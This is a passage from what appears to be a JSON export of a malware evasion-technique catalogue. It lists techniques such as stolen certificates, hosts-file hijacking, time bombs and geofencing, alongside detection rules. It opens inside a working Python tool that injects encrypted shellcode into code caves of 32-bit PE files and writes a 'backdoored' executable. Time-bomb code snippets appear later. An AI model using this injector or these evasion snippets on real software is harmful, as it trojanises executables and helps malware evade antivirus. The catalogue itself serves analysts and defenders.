bytestr_to_bytearr(argv.payload)\r\n\t\t\tcave_opcode = bytestr_to_bytearr(argv.cave_opcodes)\r\n\t\t\tencryption_key = bytestr_to_bytearr(argv.encryption_key)\r\n\t\texcept:\r\n\t\t\traise Exception(\"Malformed byte string. A byte string must be defined with the following format: \\\"\\\\x01\\\\x02\\\\x03...\\\\x0a\\\".\")\r\n\r\n\r\n\t\tif len(encryption_key) > 1:\r\n\t\t\traise Exception(\"Encryption key must be equal to 1 byte. Example: \\\"\\\\x0c\\\"\")\r\n\r\n\t\tdebug(f\"Loading PE File: {tcolors.blue}\\\"{argv.file}\\\"{tcolors.clear}\")\r\n\r\n\t\tpe = pefile.PE(argv.file, fast_load=False)\t\r\n\t\r\n\t\timage_base = pe.OPTIONAL_HEADER.ImageBase\r\n\t\tentry_point_address = pe.OPTIONAL_HEADER.AddressOfEntryPoint\r\n\r\n\t\tif pe.FILE_HEADER.Machine != pefile.MACHINE_TYPE[\"IMAGE_FILE_MACHINE_I386\"]:\r\n\t\t\traise Exception(\"This script is not compatible with x86-64 PE Files.\")\r\n\r\n\t\tdebug(f\"Image Base: {tcolors.blue}{hex(image_base)}{tcolors.clear}\")\r\n\t\tdebug(f\"Entry Point: {tcolors.blue}{hex(entry_point_address)}{tcolors.clear}\")\r\n\r\n\t\t#\r\n\t\t# Enumerate Code Caves in Executable Sections\r\n\t\t#\r\n\r\n\t\tcode_caves = []\r\n\r\n\t\tif len(cave_opcode) == 0:\r\n\t\t\traise Exception(f\"You must specify at least one code cave opcode (Ex: {tcolors.blue}\\\\x00\\\\x90{tcolors.clear}\")\r\n\r\n\t\tdebug(\"Searching for code caves...\")\r\n\t\tfor section in pe.sections:\r\n\t\t\tdebug(f\"Scanning {tcolors.blue}\\\"{get_section_name(section)}\\\"{tcolors.clear}, \" \\\r\n\t\t\t      f\"VirtualOffset=[{hex(section.VirtualAddress)}], RawOffset=[{hex(section.PointerToRawData)}], \" \\\r\n\t\t\t      f\"Size=[{hex(section.SizeOfRawData)}], Characteristics=[{hex(section.Characteristics)}]\")\r\n\r\n\t\t\tfor opcode in cave_opcode:\r\n\t\t\t\tcode_cave_finder(section, opcode)\r\n\r\n\r\n\t\t#\r\n\t\t# List found code caves\r\n\t\t#\t\r\n\t\tif len(code_caves) == 0:\r\n\t\t\twarning(\"No code cave present in target file.\")\r\n\t\telse:\r\n\t\t\ttitle(\"Code Cave Results\")\r\n\t\t\tfor index, cave in enumerate(code_caves):\r\n\t\t\t\tprint(f\"({tcolors.green}{index +1}{tcolors.clear}) Code cave in section=[{tcolors.blue}{cave.name}{tcolors.clear}], \"\\\r\n\t\t\t\t\t  f\"relative_offset=[{hex(cave.offset)}], cave_size=[{hex(cave.size)}], cave_type=[{hex(cave.type)}]\")\r\n\r\n\t\t\t#\r\n\t\t\t# Select desired code cave for payload injection\r\n\t\t\t#\r\n\t\t\tcave = None\t\t\r\n\t\t\twhile True:\r\n\t\t\t\tprint(f\"\\nEnter desired code cave index for code injection (CTRL+C to abort): \", end=\"\")\r\n\t\t\t\ttry:\t\t\t\t\t\r\n\t\t\t\t\tchoice = int(input())\t\t\t\t\r\n\r\n\t\t\t\t\tif (choice < 1) or (choice > len(code_caves)):\r\n\t\t\t\t\t\tcontinue\r\n\t\t\t\t\r\n\t\t\t\t\tcave = code_caves[choice -1]\r\n\r\n\t\t\t\t\tbreak\r\n\t\t\t\texcept KeyboardInterrupt:\r\n\t\t\t\t\traise Exception(\"\\nExecution aborted.\")\r\n\t\t\t\texcept:\r\n\t\t\t\t\tcontinue\r\n\r\n\t\t\tif not cave:\r\n\t\t\t\traise Exception(\"Unexpected error.\")\r\n\r\n\t\t\tdebug(\"Checking if cave section has correct flags set...\")\r\n\r\n\t\t\tdefine_section_rwe(cave.section)\r\n\r\n\t\t\tdebug(\"Retrieve section of entrypoint...\")\r\n\t\t\tentry_section = get_section_by_address(image_base + entry_point_address)\r\n\t\t\tif not entry_section:\r\n\t\t\t\traise Exception(\"Could not find section of entrypoint...\")\r\n\r\n\t\t\tsuccess(f\"Entrypoint is located in {get_section_name(entry_section)}.\")\t\t\t\r\n\r\n\t\t\tnew_entry_point_address = (cave.section.VirtualAddress + cave.offset)\r\n\r\n\t\t\tdebug(f\"Patch entrypoint address with code cave address: {hex(entry_point_address)} to {hex(new_entry_point_address)}.\")\r\n\r\n\t\t\tpe.OPTIONAL_HEADER.AddressOfEntryPoint = new_entry_point_address\r\n\r\n\t\t\t#\r\n\t\t\t# Start Encryption Mechanisms\r\n\t\t\t#\r\n\r\n\t\t\tif argv.encrypt_main_section:\r\n\t\t\t\tdebug(\"Prepare main section (entrypoint section) encryption...\")\t\t\t\t\r\n\r\n\t\t\t\tdefine_section_rwe(entry_section)\r\n\r\n\t\t\t\tdebug(\"Start encryption....\")\r\n\r\n\t\t\t\tencrypt_section(entry_section, encryption_key[0])\t\t\t\t\t\r\n\r\n\t\t\t\tsuccess(\"Main section successfully encrypted.\")\r\n\r\n\t\t\tdebug(\"Carving code cave payload...\")\r\n\r\n\t\t\t#\r\n\t\t\t# Prologue\r\n\t\t\t#\r\n\r\n\t\t\tdebug(\"Writing code cave prologue: saving registers, flags, ESP recovery mechanism...\")\t\t\t\r\n\r\n\t\t\t# Save registers and flags\r\n\t\t\tpayload = b\"\"\r\n\t\t\tpayload += b\"\\x60\" # pushad\r\n\t\t\tpayload += b\"\\x9C\" # pushfd\t\t\t\t\t\t\r\n\r\n\t\t\t# Place eggs to recover stack state (restore ESP to original and expected value)\t\t\r\n\t\t\tegg = argv.egg.encode('ascii')[::-1]\r\n\t\t\tpayload += ((b\"\\x68\" + egg) * 2) # egg!egg!\r\n\r\n\r\n\t\t\t#\r\n\t\t\t# Decryption Routine (If encryption was requested)\r\n\t\t\t# \r\n\t\t\tif argv.encrypt_main_section:\r\n\t\t\t\tdebug(\"Writing code cave decryption routine to decrypt main section...\")\r\n\r\n\t\t\t\tpayload += b\"\\xe8\\x00\\x00\\x00\\x00\"              # call (next_instruction) and save EIP to ESP\r\n\t\t\t\tpayload += b\"\\x5e\"                              # pop esi\r\n\t\t\t\tpayload += b\"\\x83\\xee\"                          # sub esi, (payload_length)\r\n\t\t\t\tpayload += struct.pack(\"B\", len(payload)- 3)    # -3 because we don't count two last instructions\r\n\t\t\t\tpayload += b\"\\x56\"                              # push esi\r\n\t\t\t\tpayload += b\"\\x5f\"                              # pop edi\r\n\t\t\t\tpayload += b\"\\x81\\xc7\"                          # add edi, (size of cave)\r\n\t\t\t\tpayload += struct.pack(\"<I\", cave.size)         # size of cave in Little Endian\r\n\t\t\t\tpayload += b\"\\x56\"                              # push esi\r\n\t\t\t\tpayload += b\"\\x58\"                              # pop eax\r\n\r\n\t\t\t\torigine_offset = image_base + cave.section.VirtualAddress + cave.offset\r\n\t\t\t\tdestination_offset = image_base + entry_section.VirtualAddress\r\n\r\n\t\t\t\tif origine_offset > destination_offset:\r\n\t\t\t\t\tpayload += b\"\\x2d\"                          # sub eax, ????????\r\n\t\t\t\t\tpayload += struct.pack(\"<I\", (origine_offset - destination_offset))\r\n\t\t\t\telse:\r\n\t\t\t\t\tpayload += b\"\\x05\"                          # add eax, ????????\r\n\t\t\t\t\tpayload += struct.pack(\"<I\", (destination_offset - origine_offset))\r\n\r\n\t\t\t\tpayload += b\"\\x50\"         # push eax\r\n\t\t\t\tpayload += b\"\\x5b\"         # pop ebx\r\n\t\t\t\tpayload += b\"\\x81\\xc3\"     # add ebx, (main section start + end)\r\n\t\t\t\tpayload += struct.pack(\"<I\", entry_section.SizeOfRawData)\r\n\r\n\t\t\t\tpayload += b\"\\x3b\\xc6\"     # cmp eax, esi\r\n\t\t\t\tpayload += b\"\\x7c\\x04\"     # jl (xor routine)\r\n\t\t\t\tpayload += b\"\\x3b\\xc7\"     # cmp eax, edi\r\n\t\t\t\tpayload += b\"\\x7c\\x03\"     # jl (inc eax)\r\n\t\t\t\tpayload += b\"\\x80\\x30\"     # xor byte [eax], (xor_key_byte)\r\n\t\t\t\tpayload += struct.pack(\"B\", encryption_key[0])\r\n\t\t\t\tpayload += b\"\\x40\"         # inc eax\r\n\t\t\t\tpayload += b\"\\x3b\\xc3\"     # cmp eax, ebx\r\n\t\t\t\tpayload += b\"\\x75\\xf0\"     # jne (cmp eax, esi)\r\n\r\n\r\n\t\t\t#\r\n\t\t\t# Insert Shellcode\r\n\t\t\t#\r\n\t\t\tif argv.payload:\r\n\t\t\t\tdebug(f\"Writing shellcode payload, size=[{hex(len(shellcode))}]...\")\r\n\r\n\t\t\t\tpayload += bytes(shellcode)\r\n\r\n\t\t\t#\r\n\t\t\t# Epilogue (Restore ESP, registers, entrypoint)\r\n\t\t\t#\r\n\r\n\t\t\tdebug(\"Writing code cave epilogue: restore ESP, flags, registers and jump back to original entrypoint...\")\t\t\r\n\r\n\t\t\t# restore ESP\r\n\t\t\tpayload += b\"\\xb8\" + egg   # mov eax, \"egg\"\r\n\t\t\tpayload += b\"\\x54\"         # push esp\r\n\t\t\tpayload += b\"\\x5f\"         # pop edi\r\n\t\t\tpayload += b\"\\xaf\"         # scasd\r\n\t\t\tpayload += b\"\\x75\\x0c\"     # jnz _pop_ebx\r\n\t\t\tpayload += b\"\\xaf\"         # scasd\r\n\t\t\tpayload += b\"\\x75\\x09\"     # jnz _pop_ebx\r\n\t\t\tpayload += b\"\\x57\"         # push edi\r\n\t\t\tpayload += b\"\\x5c\"         # pop esp\r\n\r\n\t\t\t# Restore Registers\r\n\t\t\tpayload += b\"\\x9D\"         # popfd\r\n\t\t\tpayload += b\"\\x61\"         # popad\t\t\r\n\r\n\t\t\tinstruction_size = 5  # bytes (0xe9/jmp) 0x???????? (Little Endian)\r\n\r\n\t\t\tfrom_offset = cave.section.VirtualAddress + cave.offset + len(payload) + instruction_size\r\n\r\n\t\t\tjmp_to_offset = get_rel_distance(from_offset, entry_point_address)\r\n\r\n\t\t\t# Jump back to original entrypoint\r\n\t\t\tpayload += b\"\\xe9\"                           # jmp\r\n\t\t\tpayload += struct.pack(\"<I\", jmp_to_offset)  # ????????\r\n\r\n\t\t\t# Part of ESP restoration\r\n\t\t\tpayload += b\"\\x5b\"                           # pop ebx\r\n\t\t\tpayload += b\"\\xeb\\xee\"                       # jmp _push_esp\t\t\r\n\r\n\t\t\t#\r\n\t\t\t# Write Final Payload to Section\r\n\t\t\t#\r\n\r\n\t\t\tif len(payload) > cave.size:\r\n\t\t\t\terror(\"Cave size is too small to be used with your payload.\")\r\n\t\t\telse:\r\n\t\t\t\tpe.set_bytes_at_offset((cave.section.PointerToRawData + cave.offset), payload)\r\n\r\n\t\t\t\tfile_info = os.path.splitext(argv.file)\r\n\r\n\t\t\t\toutput_file = f\"{file_info[0]}_backdoored{file_info[1]}\"\r\n\r\n\t\t\t\tsuccess(f\"Success! backdoored version location: \\\"{output_file}\\\".\")\r\n\t\t\t\t\t\t\r\n\t\t\t\tpe.write(output_file)\r\n\texcept Exception as e:\r\n\t\texc_type, exc_obj, exc_tb = sys.exc_info()\r\n\t\terror(f\"{str(e)}, line=[{exc_tb.tb_lineno}]\")"
                }
            ],
            "detection_rules": []
        },
        {
            "name": "Stolen certificate",
            "category": [
                "https://search.unprotect.it/api/categories/2/"
            ],
            "description": "To avoid detection, attackers can use stolen certificates from known companies. It allows the malware to bypass security solution.",
            "resources": "https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "name": "Redirect Antivirus Website",
            "category": [
                "https://search.unprotect.it/api/categories/2/"
            ],
            "description": "To avoid connection to anti malware website, malware can modify the host file to redirect the connexion.",
            "resources": "https://blog.malwarebytes.com/cybercrime/2016/09/hosts-file-hijacks/",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "name": "Time Bomb",
            "category": [
                "https://search.unprotect.it/api/categories/14/",
                "https://search.unprotect.it/api/categories/1/"
            ],
            "description": "Attacks can be performed during a limited time. To avoid detection some malware contain an deadline date. Once the date is reached the malware do not run anymore. Malware analyst have to change the time of the machine to run the file. This technique can also defeat a sandbox if the date is already outdated.",
            "resources": "https://en.wikipedia.org/wiki/Time_bomb_(software)",
            "tags": "timebomb",
            "snippets": [
                {
                    "language": "https://search.unprotect.it/api/snippet_languages/2/",
                    "author": "https://search.unprotect.it/api/snippet_authors/3/",
                    "technique": "https://search.unprotect.it/api/techniques/103/",
                    "description": "Trigger the action on Monday.",
                    "plain_code": "#include <Windows.h>\r\n#include <iostream>\r\n#include <ctime>\r\n#include <stdio.h>\r\n\r\nusing namespace std;\r\n\r\n// Trigger the action only on Monday\r\nint WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {\r\n    time_t rawtime;\r\n    struct tm * timeinfo;\r\n    char buffer[100];\r\n\r\n    time(&rawtime);\r\n    timeinfo = localtime(&rawtime);\r\n\r\n    strftime(buffer, sizeof(buffer), \"%A\", timeinfo);\r\n\r\n    const char * str(buffer);\r\n\r\n    if (str == \"Monday\")\r\n    {\r\n        cout << \"Wait!\" << endl;\r\n        MessageBox(NULL, (LPSTR)str, (LPSTR)str, MB_OK);\r\n    }\r\n    else\r\n    {\r\n        cout << \"Time of attack!\" << endl;\r\n        MessageBox(NULL, (LPSTR)str, (LPSTR)str, MB_OK);\r\n    }\r\n    return 0;\r\n}"
                },
                {
                    "language": "https://search.unprotect.it/api/snippet_languages/2/",
                    "author": "https://search.unprotect.it/api/snippet_authors/3/",
                    "technique": "https://search.unprotect.it/api/techniques/103/",
                    "description": "This code snippet triggers actions after one day since the compile time.",
                    "plain_code": "#include <ctime>\r\n#include <iostream>\r\n#include <string>\r\n#include <sstream>\r\n\r\nconst double time_attack_in_days = 1.0;\r\n\r\nusing namespace std;\r\n\r\ntime_t time_when_compiled()\r\n{\r\n    string datestr = __DATE__;\r\n    string timestr = __TIME__;\r\n    istringstream iss_date(datestr);\r\n    string str_month;\r\n    int day;\r\n    int year;\r\n    iss_date >> str_month >> day >> year;\r\n\r\n    int month;\r\n    if      (str_month == \"Jan\") month = 1;\r\n    else if (str_month == \"Feb\") month = 2;\r\n    else if (str_month == \"Mar\") month = 3;\r\n    else if (str_month == \"Apr\") month = 4;\r\n    else if (str_month == \"May\") month = 5;\r\n    else if (str_month == \"Jun\") month = 6;\r\n    else if (str_month == \"Jul\") month = 7;\r\n    else if (str_month == \"Aug\") month = 8;\r\n    else if (str_month == \"Sep\") month = 9;\r\n    else if (str_month == \"Oct\") month = 10;\r\n    else if (str_month == \"Nov\") month = 11;\r\n    else if (str_month == \"Dec\") month = 12;\r\n    else exit(-1);\r\n\r\n    for(string::size_type pos = timestr.find(':'); pos != string::npos; pos = timestr.find(':', pos))\r\n    {\r\n    \ttimestr[pos] = ' ';\r\n    }\r\n\r\n    istringstream iss_time(timestr);\r\n    int hour, min, sec;\r\n    iss_time >> hour >> min >> sec;\r\n    tm t = {0};\r\n    t.tm_mon = month - 1;\r\n    t.tm_mday = day;\r\n    t.tm_year = year - 1900;\r\n    t.tm_hour = hour;\r\n    t.tm_min = min;\r\n    t.tm_sec = sec;\r\n\r\n    return mktime(&t);\r\n}\r\n\r\nint main()\r\n{\r\n    time_t current_time = time(NULL);\r\n    time_t build_time = time_when_compiled();\r\n\r\n    double diff_time = difftime(current_time, build_time);\r\n    const double time_to_wait = time_attack_in_days * 24.0 * 60.0 * 60.0;\r\n\r\n    // trigger the time of execution\r\n    if(diff_time > time_to_wait)\r\n    {\r\n        cout << \"Time of attack!\" << endl;\r\n        exit(-1);\r\n    }\r\n    else\r\n    {\r\n        cout << \"Time in second before running the attack: \" << time_to_wait << endl;\r\n    }\r\n\r\n    return 0;\r\n}"
                }
            ],
            "detection_rules": []
        },
        {
            "name": "Shortcut Hiding",
            "category": [
                "https://search.unprotect.it/api/categories/2/"
            ],
            "description": "A Windows shortcut can stored some code to download an additional file or store the malicious file directly into the shortcut. This makes the malicious application fully undetectable by any antivirus.",
            "resources": "https://www.phrozen.io/2017/04/shortcuts-as-entry-point-of-malware-part-1/",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "name": "Infection by Localisation",
            "category": [
                "https://search.unprotect.it/api/categories/14/"
            ],
            "description": "Some Malware infects machine by localisation. Some governments protect malicious activities unless the targets are in the country.",
            "resources": "https://www.vmray.com/cyber-security-blog/sandbox-evasion-techniques-part-4/",
            "tags": "",
            "snippets": [],
            "detection_rules": [
                {
                    "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
                    "name": "detect_region",
                    "rule": "title: Geofenced Ru\r\nstatus: experimental\r\ndescription: Detect region and exit if matched with harcoded country list Get-UICulture).Name -match \"CN|RO|RU|UA|BY \r\nauthor: Joe Security\r\ndate: 2019-11-06\r\nid: 200019\r\nthreatname:\r\nbehaviorgroup: 8\r\nclassification: 8\r\nmitreattack: T1241\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*R2V0LVVJQ3VsdHVyZSkuTmFtZSAtbWF0Y2ggIkNOfFJPfFJVfFVBfEJZI*'\r\n      condition: selection\r\nlevel: critical"
                }
            ]
        },
        {
            "name": "Custom Encoding",
            "category": [
                "https://search.unprotect.it/api/categories/7/"
            ],
            "description": "Malware often uses custom encoding schemes. It could be a full custom layer or a different layer of known algorithm (e.g: XOR+Base64).",
            "resources": "https://securityintelligence.com/an-example-of-common-string-and-payload-obfuscation-techniques-in-malware/",
            "tags": "",
            "snippets": [],
            "detection_rules": [
                {
                    "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
                    "name": "stackstring_obf",
                    "rule": "rule:\r\n  meta:\r\n    name: contain obfuscated stackstrings\r\n    namespace: anti-analysis/obfuscation/string/stackstring\r\n    author: moritz.raabe@fireeye.com\r\n    scope: basic block\r\n    att&ck:\r\n      - Defense Evasion::Obfuscated Files or Information [T1027]\r\n    mbc:\r\n      - Anti-Static Analysis::Disassembler Evasion::Argument Obfuscation [B0012.001]\r\n    examples:\r\n      - Practical Malware Analysis Lab 16-03.exe_:0x4013D0\r\n  features:\r\n    - characteristic: stack string"
                }
            ]
        },
        {
            "name": "Cryptography",
            "category": [
                "https://search.unprotect.it/api/categories/7/"
            ],
            "description": "Cryptography is often use in malware to protect against analysis or to perform malicious action (e.g: ransomware).",
            "resources": "https://www.blackhat.com/docs/sp-14/materials/arsenal/sp-14-Schmitt-A-Different-Kind-of-Crypto-Slides.pdf",
            "tags": "",
            "snippets": [],
            "detection_rules": [
                {
                    "type": "https://search.unprotect.it/api/detection_rule_categories/1/",
                    "name": "Findcrypt",
                    "rule": "/*\r\n    from https://github.com/Yara-Rules/rules/tree/master/Crypto\r\n    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.\r\n*/\r\nrule Big_Numbers0\r\n{\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Looks for big numbers 20:sized\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = /[0-9a-fA-F]{20}/ fullword ascii\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Big_Numbers1\r\n{\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Looks for big numbers 32:sized\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = /[0-9a-fA-F]{32}/ fullword wide ascii\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Big_Numbers2\r\n{\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Looks for big numbers 48:sized\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = /[0-9a-fA-F]{48}/ fullword wide ascii\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Big_Numbers3\r\n{\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Looks for big numbers 64:sized\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n        \t$c0 = /[0-9a-fA-F]{64}/ fullword wide ascii\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Big_Numbers4\r\n{\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Looks for big numbers 128:sized\"\r\n\t\tdate = \"2016-08\"\r\n\tstrings:\r\n        \t$c0 = /[0-9a-fA-F]{128}/ fullword wide ascii\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Big_Numbers5\r\n{\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Looks for big numbers 256:sized\"\r\n\t\tdate = \"2016-08\"\r\n\tstrings:\r\n        \t$c0 = /[0-9a-fA-F]{256}/ fullword wide ascii\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Prime_Constants_char {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"List of primes [char]\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = { 03 05 07 0B 0D 11 13 17 1D 1F 25 29 2B 2F 35 3B 3D 43 47 49 4F 53 59 61 65 67 6B 6D 71 7F 83 89 8B 95 97 9D A3 A7 AD B3 B5 BF C1 C5 C7 D3 DF E3 E5 E9 EF F1 FB }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Prime_Constants_long {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"List of primes [long]\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = { 03 00 00 00 05 00 00 00 07 00 00 00 0B 00 00 00 0D 00 00 00 11 00 00 00 13 00 00 00 17 00 00 00 1D 00 00 00 1F 00 00 00 25 00 00 00 29 00 00 00 2B 00 00 00 2F 00 00 00 35 00 00 00 3B 00 00 00 3D 00 00 00 43 00 00 00 47 00 00 00 49 00 00 00 4F 00 00 00 53 00 00 00 59 00 00 00 61 00 00 00 65 00 00 00 67 00 00 00 6B 00 00 00 6D 00 00 00 71 00 00 00 7F 00 00 00 83 00 00 00 89 00 00 00 8B 00 00 00 95 00 00 00 97 00 00 00 9D 00 00 00 A3 00 00 00 A7 00 00 00 AD 00 00 00 B3 00 00 00 B5 00 00 00 BF 00 00 00 C1 00 00 00 C5 00 00 00 C7 00 00 00 D3 00 00 00 DF 00 00 00 E3 00 00 00 E5 00 00 00 E9 00 00 00 EF 00 00 00 F1 00 00 00 FB 00 00 00 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\n\r\nrule Advapi_Hash_API {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Looks for advapi API functions\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$advapi32 = \"advapi32.dll\" wide ascii nocase\r\n\t\t$CryptCreateHash = \"CryptCreateHash\" wide ascii\r\n\t\t$CryptHashData = \"CryptHashData\" wide ascii\r\n\t\t$CryptAcquireContext = \"CryptAcquireContext\" wide ascii\r\n\tcondition:\r\n\t\t$advapi32 and ($CryptCreateHash and $CryptHashData and $CryptAcquireContext)\r\n}\r\n\r\nrule Crypt32_CryptBinaryToString_API {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Looks for crypt32 CryptBinaryToStringA function\"\r\n\t\tdate = \"2016-08\"\r\n\tstrings:\r\n\t\t$crypt32 = \"crypt32.dll\" wide ascii nocase\r\n\t\t$CryptBinaryToStringA = \"CryptBinaryToStringA\" wide ascii\r\n\tcondition:\r\n\t\t$crypt32 and ($CryptBinaryToStringA)\r\n}\r\n\r\nrule CRC32c_poly_Constant {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for CRC32c (Castagnoli) [poly]\"\r\n\t\tdate = \"2016-08\"\r\n\tstrings:\r\n\t\t$c0 = { 783BF682 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule CRC32_poly_Constant {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for CRC32 [poly]\"\r\n\t\tdate = \"2015-05\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 2083B8ED }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule CRC32_table {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for CRC32 table\"\r\n\t\tdate = \"2015-05\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 00 00 00 00 96 30 07 77 2C 61 0E EE BA 51 09 99 19 C4 6D 07 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule CRC32_table_lookup {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"CRC32 table lookup\"\r\n\t\tdate = \"2015-06\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 8B 54 24 08 85 D2 7F 03 33 C0 C3 83 C8 FF 33 C9 85 D2 7E 29 56 8B 74 24 08 57 8D 9B 00 00 00 00 0F B6 3C 31 33 F8 81 E7 FF 00 00 00 C1 E8 08 33 04 BD ?? ?? ?? ?? 41 3B CA 7C E5 5F 5E F7 D0 C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule CRC32b_poly_Constant {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for CRC32b [poly]\"\r\n\t\tdate = \"2016-04\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { B71DC104 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\n\r\nrule CRC16_table {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for CRC16 table\"\r\n\t\tdate = \"2016-04\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 00 00 21 10 42 20 63 30 84 40 A5 50 C6 60 E7 70 08 81 29 91 4A A1 6B B1 8C C1 AD D1 CE E1 EF F1 31 12 10 02 73 32 52 22 B5 52 94 42 F7 72 D6 62 39 93 18 83 7B B3 5A A3 BD D3 9C C3 FF F3 DE E3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\n\r\nrule FlyUtilsCnDES_ECB_Encrypt {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for FlyUtils.CnDES Encrypt ECB function\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 E8 53 56 57 33 DB 89 5D E8 89 5D EC 8B D9 89 55 F8 89 45 FC 8B 7D 08 8B 75 20 8B 45 FC E8 ?? ?? ?? ?? 8B 45 F8 E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 80 7D 18 00 74 1A 0F B6 55 18 8D 4D EC 8B 45 F8 E8 ?? ?? ?? ?? 8B 55 EC 8D 45 F8 E8 ?? ?? ?? ?? 80 7D 1C 00 74 1A 0F B6 55 1C 8D 4D E8 8B 45 FC E8 ?? ?? ?? ?? 8B 55 E8 8D 45 FC E8 ?? ?? ?? ?? 85 DB 75 07 E8 ?? ?? ?? ?? 8B D8 85 F6 75 07 E8 ?? ?? ?? ?? 8B F0 53 6A 00 8B 4D FC B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 F4 33 D2 55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 6A 00 6A 00 8B 45 F4 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 6A 00 33 C9 B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 F0 33 D2 55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 6A 00 6A 00 56 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FlyUtilsCnDES_ECB_Decrypt {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for FlyUtils.CnDES Decrypt ECB function\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 E8 53 56 57 33 DB 89 5D E8 89 5D EC 8B F9 89 55 F8 89 45 FC 8B 5D 18 8B 75 20 8B 45 FC E8 ?? ?? ?? ?? 8B 45 F8 E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 84 DB 74 18 8B D3 8D 4D EC 8B 45 F8 E8 ?? ?? ?? ?? 8B 55 EC 8D 45 F8 E8 ?? ?? ?? ?? 85 FF 75 07 E8 ?? ?? ?? ?? 8B F8 85 F6 75 07 E8 ?? ?? ?? ?? 8B F0 8B 4D FC B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 F4 33 D2 55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 57 6A 00 33 C9 B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 F0 33 D2 55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 6A 00 6A 00 56 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 FF 75 14 FF 75 10 8B 45 0C 50 8B 4D F8 8B 55 F0 8B 45 F4 E8 ?? ?? ?? ?? 6A 00 6A 00 8B 45 F0 E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 55 08 8B 